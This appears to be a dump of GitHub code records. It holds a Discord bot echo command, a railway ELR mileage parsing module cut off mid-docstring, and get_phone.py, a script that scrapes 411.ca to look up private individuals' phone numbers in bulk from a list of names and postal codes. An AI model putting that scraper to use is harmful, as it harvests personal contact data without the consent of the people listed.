fileFormats)\r\n\r\n\r\nmain()\r\n","repo_name":"bboisclair/organize-me","sub_path":"organize.py","file_name":"organize.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20510222375","text":"from DiscoTemplateBot.base_command import Command\n\nclass EchoCommand(Command):\n\n def __init__(self) -> None:\n super().__init__()\n self.name = \"echo\"\n self.permissions = [\"user\", \"developer\"]\n self.description = \"Confirm bot can respond to messages\"\n self.aliases = [\"echo\"]\n self.requires_input = True\n\n async def execute(self, message, ctx):\n await message.channel.send(ctx.primary)","repo_name":"nickheyer/DiscoTemplate","sub_path":"DiscoTemplateBot/commands/echo.py","file_name":"echo.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"71217818876","text":"''' get phone numbers fro 411\ncut -d ';' -f 10,11,12,13,14,16,19,23 mtl_steph.csv | awk -F ';' '{print $2,$1\",\"$4\",\"$3\",\"$5\",\"$6\",\"$7\",\"$8}' |python get_phone.py\n\nhttps://maps.google.ca/maps?q=Berri+%2F+Ren%C3%A9-L%C3%A9vesque,+Montr%C3%A9al,+QC&hl=fr&ie=UTF8&sll=45.619561,-73.605652&sspn=0.204828,0.506058&oq=berri+rene&hnear=Berri+%2F+Ren%C3%A9-L%C3%A9vesque&t=m&z=17\nhttp://411.ca/search/?q=denis%20lacasse&st=person&point=45.5756,-73.730621&nearme=1&p=1\n'''\nimport re\nimport sys\nimport urllib.request, urllib.error, urllib.parse\nimport time\npoint = '&point=45.619561,-73.605652&nearme=1&p=1'\nurl_411=\"http://411.ca/search/?q={name}&st=person%s\" %point\npattern_href = re.compile('.*... more.*')\npattern_phone = re.compile('.*

(.*)

.*')\npattern_postal = re.compile('.*span itemprop=\"postalCode\">(.*).*')\n\ndef get_phone_number(full_name, postal_code=None):\n try:\n url = url_411.format(name=full_name).replace(\" \",\"%20\")\n #print url\n response = urllib.request.urlopen(url)\n content = response.read()\n url = \"http://411.ca/%s\" %pattern_href.search(content).group(1)\n response = urllib.request.urlopen(url)\n content = response.read()\n postal = pattern_postal.search(content).group(1).replace(' ','')\n if not postal or (postal and postal == postal_code): \n return pattern_phone.search(content).group(1)\n else:\n print(\"%s != %s\" %(postal, postal_code))\n return \"bad\"\n except Exception as ex:\n print(ex)\n return None\n \nif __name__ == \"__main__\":\n from optparse import OptionParser\n op = OptionParser(__doc__)\n op.add_option(\"-n\", default=None, dest=\"name\", \n help=\"full name to search\")\n op.add_option(\"-p\", default=0, type=\"int\", dest=\"pos_name\", \n help=\"position of full name\")\n op.add_option(\"-P\", default=6, type=\"int\", dest=\"pos_postal\", \n help=\"position of postal code\")\n op.add_option(\"-o\", default=\"numbers.csv\", dest=\"output\", \n help=\"output fname\") \n op.add_option(\"-s\", default=0, dest=\"sleep\", type=int, \n help=\"output fname\")\n opts, args = op.parse_args(sys.argv)\n \n if opts.name:\n print(\"%s\\t%s\" %(opts.name, get_phone_number(opts.name)))\n else:\n print(\"reading from stdin, saving -> %s\" %(opts.output))\n out = open(opts.output, 'w')\n for i, line in enumerate(sys.stdin):\n print(i+1)\n line = line.strip()\n els = line.split(',')\n name = els[opts.pos_name]\n postal = els[opts.pos_postal] \n number = get_phone_number(name, postal)\n if opts.sleep>0:\n time.sleep(opts.sleep)\n out.write(\"%s,%s\\n\" %(line, number))\n out.close()\n","repo_name":"fraka6/mlboost","sub_path":"mlboost/politics/get_phone.py","file_name":"get_phone.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"42905682777","text":"\"\"\"Collect `Engineer's Line References (ELRs) `_.\"\"\"\n\nimport copy\nimport functools\nimport itertools\nimport os\nimport re\nimport string\nimport urllib.parse\n\nimport bs4\nimport numpy as np\nimport pandas as pd\nimport requests\nfrom pyhelpers.dirs import cd\nfrom pyhelpers.ops import confirmed, fake_requests_headers, loop_in_pairs\nfrom pyhelpers.store import load_data, save_data\nfrom pyhelpers.text import remove_punctuation\n\nfrom ..converter import kilometer_to_yard, mile_chain_to_mileage, mileage_to_mile_chain, yard_to_mileage\nfrom ..parser import get_catalogue, get_last_updated_date, parse_table\nfrom ..utils import collect_in_fetch_verbose, format_err_msg, home_page_url, init_data_dir, \\\n is_home_connectable, is_str_float, print_conn_err, print_inst_conn_err, print_void_msg, \\\n save_data_to_file, validate_initial\n\n\nclass ELRMileages:\n \"\"\"\n A class for collecting data of `Engineer's Line References (ELRs)`_.\n\n .. _`Engineer's Line References (ELRs)`: http://www.railwaycodes.org.uk/elrs/elr0.shtm\n \"\"\"\n\n #: str: Name of the data.\n NAME = \"Engineer's Line References (ELRs)\"\n #: str: Key of the `dict `_-type data.\n KEY = 'ELRs and mileages'\n #: str: URL of the main web page of the data.\n URL = urllib.parse.urljoin(home_page_url(), '/elrs/elr0.shtm')\n #: str: Key of the data of the last updated date.\n KEY_TO_LAST_UPDATED_DATE = 'Last updated date'\n\n def __init__(self, data_dir=None, update=False, verbose=True):\n \"\"\"\n :param data_dir: The name of a folder for the data directory, defaults to ``None``.\n :type data_dir: str or None\n :param update: Whether to do an update check (for the package data), defaults to ``False``.\n :type update: bool\n :param verbose: Whether to print relevant information in console, defaults to ``True``.\n :type verbose: bool or int\n\n :ivar dict catalogue: The catalogue of the data.\n :ivar str last_updated_date: The last updated date.\n :ivar str data_dir: An absolute path to the data directory.\n :ivar str current_data_dir: An absolute path to the current data directory.\n :ivar list measure_headers: A list of possible headers for different measures.\n\n **Examples**::\n\n >>> from pyrcs.line_data import ELRMileages # from pyrcs import ELRMileages\n\n >>> em = ELRMileages()\n\n >>> em.NAME\n \"Engineer's Line References (ELRs)\"\n\n >>> em.URL\n 'http://www.railwaycodes.org.uk/elrs/elr0.shtm'\n \"\"\"\n\n print_conn_err(verbose=verbose)\n\n self.catalogue = get_catalogue(url=self.URL, update=update, confirmation_required=False)\n\n self.last_updated_date = get_last_updated_date(url=self.URL, parsed=True, as_date_type=False)\n\n self.data_dir, self.current_data_dir = init_data_dir(\n self, data_dir=data_dir, category=\"line-data\")\n\n self.measure_headers = [' '.join(x) for x in itertools.product(\n *(('Current', 'Later', 'Earlier', 'One', 'Original', 'Former', 'Alternative', 'Usual',\n 'New', 'Old'),\n ('measure', 'route')))]\n\n def _cdd(self, *sub_dir, mkdir=True, **kwargs):\n \"\"\"\n Change directory to package data directory and subdirectories (and/or a file).\n\n The directory for this module: ``\"data\\\\line-data\\\\elrs-and-mileages\"``.\n\n :param sub_dir: subdirectory or subdirectories (and/or a file)\n :type sub_dir: str\n :param mkdir: whether to create the specified directory, defaults to ``True``\n :type mkdir: bool\n :param kwargs: [optional] parameters of the function `pyhelpers.dir.cd`_\n :return: path to the backup data directory for the class\n :py:class:`~pyrcs.line_data.elr_mileage.ELRMileages`\n :rtype: str\n\n .. _`pyhelpers.dir.cd`:\n https://pyhelpers.readthedocs.io/en/latest/_generated/pyhelpers.dir.cd.html\n \"\"\"\n\n kwargs.update({'mkdir': mkdir})\n path = cd(self.data_dir, *sub_dir, **kwargs)\n\n return path\n\n def _split_measures(self, mileage_data, measure_headers_indices):\n \"\"\"\n Process data of mileage file with multiple measures.\n\n :param mileage_data: scraped raw mileage file from source web page\n :type: pandas.DataFrame\n \"\"\"\n\n dat = mileage_data.copy()\n\n if len(measure_headers_indices) >= 1:\n\n if len(measure_headers_indices) == 1 and measure_headers_indices[0] != 0:\n j = measure_headers_indices[0]\n m_key, m_val = dat.loc[j, 'Node'].split()\n d = {\n 'Earlier': 'Later',\n 'Later': 'Earlier',\n 'Alternative': 'One',\n 'One': 'Alternative',\n 'Original': 'Current',\n 'Current': 'Original',\n 'Former': 'Current',\n 'Old': 'Current',\n 'New': 'Old',\n }\n if m_key in d.keys():\n measure_headers_indices = [0] + [j + 1]\n new_m_key = d[m_key] + ' ' + m_val\n dat.loc[-1] = ['', new_m_key] # adding a row\n dat.index = dat.index + 1\n dat.sort_index(inplace=True)\n\n # if measure_headers_indices[-1] != dat.index[-1] - 1:\n # sep_rows_idx = loop_in_pairs(measure_headers_indices + [dat.index[-1]])\n # else:\n sep_rows_idx = loop_in_pairs(measure_headers_indices + [dat.index[-1] + 1])\n dat_ = {dat.loc[i, 'Node']: dat.loc[i + 1:j - 1] for i, j in sep_rows_idx}\n\n else:\n test_temp = dat[~dat['Mileage'].astype(bool)]\n if not test_temp.empty:\n test_temp_node, sep_rows_idx = test_temp['Node'].tolist(), test_temp.index[-1]\n\n if '1949 measure' in test_temp_node:\n dat['Node'] = dat['Node'].str.replace('1949 measure', 'Current measure')\n test_temp_node = [re.sub(r'1949 ', 'Current ', x) for x in test_temp_node]\n\n # if 'Distances in km' in test_temp_node:\n # dat_ = dat[~dat['Node'].str.contains('Distances in km')]\n # temp_mileages = dat_['Mileage'].map(\n # lambda x: mileage_to_mile_chain(yard_to_mileage(kilometer_to_yard(km=x))))\n # dat_['Mileage'] = temp_mileages.tolist()\n\n if 'One measure' in test_temp_node:\n sep_rows_idx = dat[dat['Node'].str.contains('Alternative measure')].index[0]\n m_dat_1, m_dat_2 = np.split(dat, [sep_rows_idx], axis=0)\n dat_ = {\n 'One measure':\n m_dat_1[~m_dat_1['Node'].str.contains('One measure')],\n 'Alternative measure':\n m_dat_2[~m_dat_2['Node'].str.contains('Alternative measure')],\n }\n\n elif 'Later measure' in test_temp_node:\n sep_rows_idx = dat[dat['Node'].str.contains('Later measure')].index[0]\n m_dat_1, m_dat_2 = np.split(dat, [sep_rows_idx], axis=0)\n dat_ = {\n 'Original measure': m_dat_1[~m_dat_1['Node'].str.contains('Original measure')],\n 'Later measure': m_dat_2[~m_dat_2['Node'].str.contains('Later measure')],\n }\n\n elif \"This line has two 'legs':\" in test_temp_node:\n dat_ = dat.iloc[1:].drop_duplicates(ignore_index=True)\n\n elif 'Measure sometimes used' in test_temp_node:\n sep_rows_idx = test_temp.index.tolist() + [dat.index[-1]]\n dat_ = {dat.loc[j, 'Node']: dat.loc[j + 1:k] for j, k in loop_in_pairs(sep_rows_idx)}\n\n else:\n alt_sep_rows_idx = [x in test_temp_node for x in self.measure_headers]\n num_of_measures = sum(alt_sep_rows_idx)\n\n if num_of_measures == 1: #\n m_name = self.measure_headers[alt_sep_rows_idx.index(True)] # measure name\n sep_rows_idx = dat[dat['Node'].str.contains(m_name)].index[0]\n m_dat_1, m_dat_2 = np.split(dat, [sep_rows_idx], axis=0)\n\n x = [x_ for x_ in test_temp_node if 'measure' in x_ or 'route' in x_][0]\n if re.match(r'(Original)|(Former)|(Alternative)|(Usual)', x):\n measure_ = re.sub(r'(Original)|(Former)|(Alternative)|(Usual)', 'Current', x)\n else:\n measure_ = re.sub(r'(Current)|(Later)|(One)', 'Previous', x)\n\n dat_ = {\n measure_: m_dat_1.loc[0:sep_rows_idx, :],\n test_temp_node[0]: m_dat_2.loc[sep_rows_idx + 1:, :],\n }\n\n elif num_of_measures == 2: # e.g. elr='BTJ'\n sep_rows_idx_items = [\n self.measure_headers[x] for x in np.where(alt_sep_rows_idx)[0]]\n sep_rows_idx = dat[dat['Node'].isin(sep_rows_idx_items)].index[-1]\n\n m_dat_list = np.split(dat, [sep_rows_idx], axis=0) # m_dat_1, m_dat_2\n sep_rows_idx_items_checked = map(\n lambda x: x[x['Node'].isin(sep_rows_idx_items)]['Node'].iloc[0], m_dat_list)\n m_dat_list_ = map(lambda x: x[~x['Node'].isin(sep_rows_idx_items)], m_dat_list)\n\n dat_ = dict(zip(sep_rows_idx_items_checked, m_dat_list_))\n\n else:\n if dat.loc[sep_rows_idx, 'Mileage'] == '':\n dat.loc[sep_rows_idx, 'Mileage'] = dat.loc[sep_rows_idx - 1, 'Mileage']\n dat_ = dat\n\n else:\n dat_ = dat\n\n return dat_\n\n @staticmethod\n def _parse_mileage(mileage):\n \"\"\"\n Parse column of mileage data.\n\n :param mileage: column of mileage data\n :type mileage: pandas.Series\n :return: parsed mileages\n :rtype: pandas.DataFrame\n \"\"\"\n\n mileage.index = range(len(mileage))\n\n if any(mileage.str.match('.*km')):\n if all(mileage.str.match('.*km')):\n mileage_ = mileage.str.replace(r'km|\\(|\\)', '', regex=True).map(\n lambda x: yard_to_mileage(kilometer_to_yard(km=x.replace('≈', ''))))\n\n # Warning: This might not be correct!\n miles_chains = mileage_.map(mileage_to_mile_chain)\n\n else:\n miles_chains = mileage.map(lambda x: re.sub(r'/?\\d+\\.\\d+km/?', '', x))\n mileage_ = miles_chains.map(mile_chain_to_mileage)\n mileage_note = [x + ' (Approximate)' if x.startswith('≈') else x for x in list(mileage)]\n\n else:\n if all(mileage.map(is_str_float)):\n miles_chains = mileage\n mileage_note = [''] * len(miles_chains)\n\n else:\n miles_chains, mileage_note = [], []\n for m in mileage:\n if m == '':\n miles_chains.append(m)\n mileage_note.append('')\n elif m.startswith('(') and m.endswith(')'):\n miles_chains.append(re.search(r'\\d+\\.\\d+', m).group(0))\n mileage_note.append('Not on this route but given for reference')\n elif m.startswith('≈') or m.endswith('?'):\n miles_chains.append(m.strip('≈').strip('?'))\n mileage_note.append('Approximate')\n elif re.match(r'\\d+\\.\\d+/\\s?\\d+\\.\\d+', m):\n m1, m2 = m.split('/')\n miles_chains.append(m1)\n mileage_note.append(m2.strip() + ' (Alternative)')\n elif ' + ' in m or 'private portion' in m:\n m1 = re.search(r'\\d+\\.\\d+', m).group(0)\n miles_chains.append(m1)\n mileage_note.append(m.replace(m1, '').strip())\n elif '†' in m:\n miles_chains.append(m.replace('†', '').strip())\n mileage_note.append(\"(See 'Notes')\")\n else:\n if re.match(r'\\d+,\\d+', m):\n miles_chains.append(m.strip(' ').replace(',', '.'))\n else:\n miles_chains.append(m.strip(' ').replace(' ', '.'))\n mileage_note.append('')\n\n mileage_ = [mile_chain_to_mileage(m) for m in miles_chains]\n\n parsed_mileage_ = {\n 'Mileage': mileage_,\n 'Mileage_Note': mileage_note,\n 'Miles_Chains': miles_chains,\n }\n parsed_mileage = pd.DataFrame(parsed_mileage_)\n\n return parsed_mileage\n\n @staticmethod\n def _preprocess_node_x(node_x):\n # node_x = node_x.replace(\n # ' with Freightliner terminal', ' & Freightliner Terminal').replace(\n # ' with curve to', ' with').replace(\n # ' (0.37 long)', '')\n # pat = re.compile(\n # r'\\w+.*( \\(\\d+\\.\\d+\\))?(/| and \\w+)? with '\n # r'([A-Z]){3}(\\d)?( \\(\\d+\\.\\d+\\))?')\n pat = re.compile(\n r'\\w+.*( \\(\\d+\\.\\d+\\))?(/| and \\w+)? with ([A-Z]).*(\\d)?( \\(\\d+\\.\\d+\\))?')\n\n if re.match(pat, node_x):\n node_name = [x.group() for x in re.finditer(r'\\w+.*(?= with)', node_x)]\n conn_node = [x.group() for x in re.finditer(r'(?<= with )[^*]+', node_x)]\n\n else:\n node_name, conn_node = [node_x], [None]\n\n return node_name + conn_node\n\n @staticmethod\n def _parse_prep_nodes(prep_nodes):\n conn_node_lst = []\n for n in prep_nodes.Connection:\n if n is not None:\n if re.match(r'[A-Z]{3}(\\d)?( \\(\\d+.\\d+\\))? ?/ ?[A-Z]{3}(\\d)?'\n r'( \\(\\d+.\\d+\\))?', n):\n m = [x.strip() for x in n.split('/')]\n else:\n m = n.split(' and ')\n if len(m) > 2:\n m = [' and '.join(m[:2]), ' and '.join(m[2:])]\n else:\n m = [n]\n conn_node_lst.append(m)\n #\n assert isinstance(conn_node_lst, list)\n\n for i in [conn_node_lst.index(c) for c in conn_node_lst if len(c) > 1]:\n temp_lst = [\n x.replace('later ', '').rstrip(',').split(' and ')\n for x in conn_node_lst[i] if isinstance(x, str)]\n\n conn_node_lst[i] = [v for lst in temp_lst for v in lst]\n temp_lst = [x.split(', ') for x in conn_node_lst[i]]\n conn_node_lst[i] = [v for lst in temp_lst for v in lst]\n\n most_conn = max(len(c) for c in conn_node_lst)\n # conn_node_list = [c + [None] * (most_conn - len(c)) for c in conn_node_list]\n\n prep_nodes_ = pd.DataFrame(\n conn_node_lst, columns=['Link_{}'.format(n + 1) for n in range(most_conn)])\n\n return prep_nodes_\n\n @staticmethod\n def _uncouple_elr_mileage(node_x):\n # e.g. x = 'ECM5 (44.64)' or x = 'DNT'\n if node_x is None:\n y = ['', '']\n else:\n # pat0 = re.compile(r'\\w+.*(( lines)|( terminal))$')\n pat1 = re.compile(r'([A-Z]{3}(\\d)?$)|((\\w\\s?)*\\w$)')\n pat2 = re.compile(r'([A-Z]{3}(\\d)?$)|(([\\w\\s&]?)*(\\s\\(\\d+\\.\\d+\\))?$)')\n # pat3 = re.compile(r'[A-Z]{3}(\\d)?(\\s\\(\\d+.\\d+\\))?\\s\\[.*?\\]$')\n pat3 = re.compile(r'[A-Z]{3}(\\d)?(\\s\\(\\d+.\\d+\\))?\\s\\[.*?]$')\n pat4 = re.compile(r'[A-Z]{3}(\\d)?\\s\\(\\d+\\.\\d+km\\)')\n # if re.match(pat0, node_x):\n # y = ['', '']\n if re.match(pat1, node_x):\n y = [node_x, '']\n elif re.match(pat2, node_x):\n y = [z[:-1] if re.match(r'\\d+.\\d+\\)', z) else z.strip() for z in node_x.split('(')]\n y[0] = '' if len(y[0]) > 4 else y[0]\n elif re.match(pat3, node_x):\n try:\n y = [\n re.search(r'[A-Z]{3}(\\d)?', node_x).group(0),\n re.search(r'\\d+\\.\\d+', node_x).group(0)]\n except AttributeError:\n y = [re.search(r'[A-Z]{3}(\\d)?', node_x).group(0), '']\n elif re.match(pat4, node_x):\n y = [\n re.search(r'[A-Z]{3}(\\d)?', node_x).group(0),\n mileage_to_mile_chain(yard_to_mileage(\n kilometer_to_yard(km=re.search(r'\\d+\\.\\d+', node_x).group(0))))]\n else:\n y = [node_x, ''] if len(node_x) <= 4 else ['', '']\n y[0] = y[0] if len(y[0]) <= 4 else ''\n\n return y\n\n def _parse_node(self, node):\n \"\"\"\n Parse column of node data.\n\n :param node: column of node data\n :type node: pandas.Series\n :return: parsed nodes\n :rtype: pandas.DataFrame\n \"\"\"\n\n prep_node = pd.DataFrame(\n (self._preprocess_node_x(n) for n in node), columns=['Node', 'Connection'])\n\n conn_nodes = self._parse_prep_nodes(prep_node)\n\n link_cols = [x for x in conn_nodes.columns if re.match(r'^(Link_\\d)', x)]\n link_nodes = conn_nodes[link_cols].applymap(self._uncouple_elr_mileage)\n\n dat = [\n pd.DataFrame(link_nodes[col].values.tolist(), columns=[col + '_ELR', col + '_Mile_Chain'])\n for col in link_cols]\n link_elr_mileage = pd.concat(dat, axis=1, sort=False)\n\n parsed_node_and_conn = pd.concat([prep_node, conn_nodes, link_elr_mileage], axis=1)\n\n return parsed_node_and_conn\n\n def _parse_mileage_data(self, mileage_data):\n \"\"\"\n Parse scraped data of mileage file.\n\n :param mileage_data: preprocessed data of mileage file scraped from source web page\n :type mileage_data: pandas.DataFrame\n :return: parsed data of mileage file\n :rtype: pandas.DataFrame\n \"\"\"\n\n mileage, node = mileage_data.iloc[:, 0], mileage_data.iloc[:, 1]\n\n parsed_mileage = self._parse_mileage(mileage=mileage)\n parsed_node_and_conn = self._parse_node(node=node)\n\n parsed_dat = pd.concat([parsed_mileage, parsed_node_and_conn], axis=1)\n\n return parsed_dat\n\n def collect_elr_by_initial(self, initial, update=False, verbose=False):\n \"\"\"\n Collect Engineer's Line References (ELRs) for a given initial letter from source web page.\n\n :param initial: initial letter of an ELR, e.g. ``'a'``, ``'z'``\n :type initial: str\n :param update: whether to do an update check (for the package data), defaults to ``False``\n :type update: bool\n :param verbose: whether to print relevant information in console, defaults to ``True``\n :type verbose: bool or int\n :return: data of ELRs whose names start with the given initial letter and\n date of when the data was last updated\n :rtype: dict\n\n **Examples**::\n\n >>> from pyrcs.line_data import ELRMileages # from pyrcs import ELRMileages\n\n >>> em = ELRMileages()\n\n >>> elrs_a_codes = em.collect_elr_by_initial(initial='a')\n >>> type(elrs_a_codes)\n dict\n >>> list(elrs_a_codes.keys())\n ['A', 'Last updated date']\n\n >>> elrs_a_codes_dat = elrs_a_codes['A']\n >>> type(elrs_a_codes_dat)\n pandas.core.frame.DataFrame\n >>> elrs_a_codes_dat.head()\n ELR ... Notes\n 0 AAL ... Now NAJ3\n 1 AAM ... Formerly AML\n 2 AAV ...\n 3 ABB ... Now AHB\n 4 ABB ...\n [5 rows x 5 columns]\n\n >>> elrs_q_codes = em.collect_elr_by_initial(initial='Q')\n >>> elrs_q_codes_dat = elrs_q_codes['Q']\n >>> elrs_q_codes_dat.head()\n ELR ... Notes\n 0 QAB ... Duplicates ALB?\n 1 QBL ...\n 2 QDS ...\n 3 QLT ...\n 4 QLT1 ...\n [5 rows x 5 columns]\n \"\"\"\n\n beginning_with = validate_initial(x=initial)\n\n path_to_pickle = self._cdd(\"a-z\", beginning_with.lower() + \".pkl\")\n if os.path.isfile(path_to_pickle) and not update:\n elrs = load_data(path_to_pickle)\n\n else:\n if verbose == 2:\n print(f\"Collecting data of {self.KEY} beginning with '{beginning_with}'\", end=\" ... \")\n\n elrs = {beginning_with: None, self.KEY_TO_LAST_UPDATED_DATE: None}\n\n try:\n url = self.catalogue[beginning_with]\n # url = em.catalogue[beginning_with]\n source = requests.get(url=url, headers=fake_requests_headers())\n\n except Exception as e:\n if verbose == 2:\n print(\"Failed.\", end=\" \")\n print_inst_conn_err(verbose=verbose, e=e)\n\n else:\n try:\n columns, records = parse_table(source=source, parser='html.parser')\n data = [[x.replace('=', 'See').strip('\\xa0') for x in i] for i in records]\n\n # Create a DataFrame of the requested table\n elrs_codes = pd.DataFrame(data=data, columns=columns)\n\n last_updated_date = get_last_updated_date(url=url, parsed=True)\n\n # Update the dict with both the DataFrame and its last updated date\n elrs = {\n beginning_with: elrs_codes,\n self.KEY_TO_LAST_UPDATED_DATE: last_updated_date,\n }\n\n if verbose == 2:\n print(\"Done.\")\n\n os.makedirs(os.path.dirname(path_to_pickle), exist_ok=True)\n save_data(elrs, path_to_pickle, verbose=verbose)\n\n except Exception as e: # e.g. the requested URL is not available:\n print(f\"Failed. {format_err_msg(e)}\")\n\n return elrs\n\n def fetch_elr(self, update=False, dump_dir=None, verbose=False):\n \"\"\"\n Fetch data of ELRs and their associated mileages.\n\n :param update: whether to do an update check (for the package data), defaults to ``False``\n :type update: bool\n :param dump_dir: pathname of a directory where the data file is dumped, defaults to ``None``\n :type dump_dir: str or None\n :param verbose: whether to print relevant information in console, defaults to ``False``\n :type verbose: bool or int\n :return: data of all available ELRs and date of when the data was last updated\n :rtype: dict\n\n **Examples**::\n\n >>> from pyrcs.line_data import ELRMileages # from pyrcs import ELRMileages\n\n >>> em = ELRMileages()\n\n >>> elrs_codes = em.fetch_elr()\n >>> type(elrs_codes)\n dict\n >>> list(elrs_codes.keys())\n ['ELRs and mileages', 'Last updated date']\n\n >>> em.KEY\n 'ELRs and mileages'\n\n >>> elrs_codes_dat = elrs_codes[em.KEY]\n >>> type(elrs_codes_dat)\n pandas.core.frame.DataFrame\n >>> elrs_codes_dat.head()\n ELR ... Notes\n 0 AAL ... Now NAJ3\n 1 AAM ... Formerly AML\n 2 AAV ...\n 3 ABB ... Now AHB\n 4 ABB ...\n [5 rows x 5 columns]\n \"\"\"\n\n verbose_1 = False if (dump_dir or not verbose) else (2 if verbose == 2 else True)\n verbose_2 = verbose_1 if is_home_connectable() else False\n\n data = [\n self.collect_elr_by_initial(initial=x, update=update, verbose=verbose_2)\n for x in string.ascii_lowercase]\n\n if all(d[x] is None for d, x in zip(data, string.ascii_uppercase)):\n if update:\n print_inst_conn_err(verbose=verbose)\n print_void_msg(data_name=self.KEY, verbose=verbose)\n data = [\n self.collect_elr_by_initial(initial=x, update=False, verbose=verbose_1)\n for x in string.ascii_lowercase]\n\n # Select DataFrames only\n elrs_data = (item[x] for item, x in zip(data, string.ascii_uppercase))\n elrs_data_table = pd.concat(elrs_data, axis=0, ignore_index=True, sort=False)\n\n # Get the latest updated date\n last_updated_dates = (\n item[self.KEY_TO_LAST_UPDATED_DATE] for item, _ in zip(data, string.ascii_uppercase))\n latest_update_date = max(d for d in last_updated_dates if d is not None)\n\n elrs_data = {self.KEY: elrs_data_table, self.KEY_TO_LAST_UPDATED_DATE: latest_update_date}\n\n if dump_dir is not None:\n save_data_to_file(\n self, data=elrs_data, data_name=self.NAME, ext=\".pkl\", dump_dir=dump_dir,\n verbose=False)\n\n return elrs_data\n\n def _mileage_file_dump_names(self, elr):\n data_name = remove_punctuation(elr).lower()\n\n if data_name == \"prn\":\n data_name += \"_\"\n\n dump_dir = self._cdd(\"mileage-files\", data_name[0])\n\n return data_name, dump_dir\n\n def _dump_mileage_file(self, elr, mileage_file, dump_it, verbose):\n if dump_it:\n data_name, dump_dir = self._mileage_file_dump_names(elr)\n\n save_data_to_file(\n self, data=mileage_file, data_name=data_name, ext=\".pkl\", dump_dir=dump_dir,\n verbose=verbose)\n\n @staticmethod\n def _get_parsed_contents(elr_dat, notes):\n val_cols = ['Line name', 'Mileages', 'Datum']\n line_name, mileages, _ = elr_dat[val_cols].values[0]\n\n if re.match(r'(\\w ?)+ \\((\\w ?)+\\)', line_name):\n line_name_ = re.search(r'(?<=\\w \\()(\\w ?)+.(?=\\))', line_name).group(0)\n\n try:\n loc_a, _, loc_b = re.split(r' (and|&|to) ', line_name_)\n line_name = re.search(r'(\\w ?)+.(?= \\((\\w ?)+\\))', line_name).group(0)\n except ValueError:\n try:\n loc_a, _, loc_b = re.split(r' (and|&|to) ', notes)\n line_name = line_name_\n except ValueError:\n loc_a, loc_b = '', ''\n\n elif elr_dat.Mileages.values[0].startswith('0.00') and elr_dat.Datum.values[0] != '':\n loc_a = elr_dat.Datum.values[0]\n if loc_a in line_name:\n loc_b = re.split(r' (and|&|to) ', line_name)[2]\n else:\n loc_b = line_name\n\n elif re.match(r'(\\w ?)+ to (\\w ?)+', notes):\n loc_a, loc_b = notes.split(' to ')\n\n else:\n loc_a, loc_b = '', ''\n\n try:\n loc_a, _, loc_b = re.split(r' (and|&|to|-) ', notes)\n except (ValueError, TypeError):\n pass\n\n try:\n loc_a, _, loc_b = re.split(r' (and|&|to|-) ', line_name)\n except (ValueError, TypeError):\n pass\n\n if line_name:\n loc_a, loc_b = line_name, line_name\n\n # if re.match(r'.*( Branch| Curve)$', loc_b):\n # loc_b = re.sub(r' Branch| Curve', '', loc_b)\n # else:\n # loc_b = loc_b\n\n miles_chains = mileages.split(' - ')\n locations = [loc_a, loc_b]\n parsed_content = [[m, l] for m, l in zip(miles_chains, locations)]\n\n return line_name, parsed_content\n\n def collect_mileage_file(self, elr, parsed=True, confirmation_required=True, dump_it=False,\n verbose=False):\n \"\"\"\n Collect mileage file for the given ELR from source web page.\n\n :param elr: ELR, e.g. ``'CJD'``, ``'MLA'``, ``'FED'``\n :type elr: str\n :param parsed: whether to parse the scraped mileage data\n :type parsed: bool\n :param confirmation_required: whether to confirm before proceeding, defaults to ``True``\n :type confirmation_required: bool\n :param dump_it: whether to save the collected data as a pickle file, defaults to ``False``\n :type dump_it: bool\n :param verbose: whether to print relevant information in console, defaults to ``False``\n :type verbose: bool or int\n :return: mileage file for the given ``elr``\n :rtype: dict\n\n .. note::\n\n - In some cases, mileages are unknown hence left blank,\n e.g. ANI2, Orton Junction with ROB (~3.05)\n - Mileages in parentheses are not on that ELR, but are included for reference,\n e.g. ANL, (8.67) NORTHOLT [London Underground]\n - As with the main ELR list, mileages preceded by a tilde (~) are approximate.\n\n **Examples**::\n\n >>> from pyrcs.line_data import ELRMileages # from pyrcs import ELRMileages\n\n >>> em = ELRMileages()\n\n >>> gam_mileage_file = em.collect_mileage_file(elr='GAM')\n To collect mileage file of \"GAM\"\n ? [No]|Yes: yes\n >>> type(gam_mileage_file)\n dict\n >>> list(gam_mileage_file.keys())\n ['ELR', 'Line', 'Sub-Line', 'Mileage', 'Notes']\n >>> gam_mileage_file['Mileage']\n Mileage Mileage_Note Miles_Chains ... Link_1 Link_1_ELR Link_1_Mile_Chain\n 0 8.1518 8.69 ... None\n 1 10.0264 10.12 ... None\n [2 rows x 8 columns]\n\n >>> xrc2_mileage_file = em.collect_mileage_file(elr='XRC2')\n To collect mileage file of \"XRC2\"\n ? [No]|Yes: yes\n >>> xrc2_mileage_file['Mileage']\n Mileage Mileage_Note ... Link_1_ELR Link_1_Mile_Chain\n 0 9.0158 14.629km ...\n 1 9.0447 14.893km ...\n 2 9.0557 14.994km ...\n [3 rows x 8 columns]\n\n >>> xre_mileage_file = em.collect_mileage_file(elr='XRE')\n To collect mileage file of \"XRE\"\n ? [No]|Yes: yes\n >>> xre_mileage_file['Mileage']\n Mileage Mileage_Note ... Link_2_ELR Link_2_Mile_Chain\n 0 7.0073 11.333km ...\n 1 7.0174 11.425km ...\n 2 9.0158 14.629km ...\n 3 9.0198 14.666km ...\n 4 9.0389 14.840km ...\n 5 9.0439 (14.886)km ...\n 6 9.0540 (14.978)km ...\n [7 rows x 11 columns]\n\n >>> mor_mileage_file = em.collect_mileage_file(elr='MOR')\n To collect mileage file of \"MOR\"\n ? [No]|Yes: yes\n >>> type(mor_mileage_file['Mileage'])\n dict\n >>> list(mor_mileage_file['Mileage'].keys())\n ['Original measure', 'Later measure']\n >>> mor_mileage_file['Mileage']['Original measure']\n Mileage Mileage_Note Miles_Chains ... Link_1 Link_1_ELR Link_1_Mile_Chain\n 0 0.0000 0.00 ... SWA (215.18) SWA 215.18\n 1 0.0792 0.36 ... None\n 2 0.1716 0.78 ... None\n 3 1.1166 1.53 ... None\n 4 2.0066 2.03 ... None\n 5 2.0836 2.38 ... None\n 6 ... None\n 7 3.0462 3.21 ... SDI2 (2.79) SDI2 2.79\n [8 rows x 8 columns]\n >>> 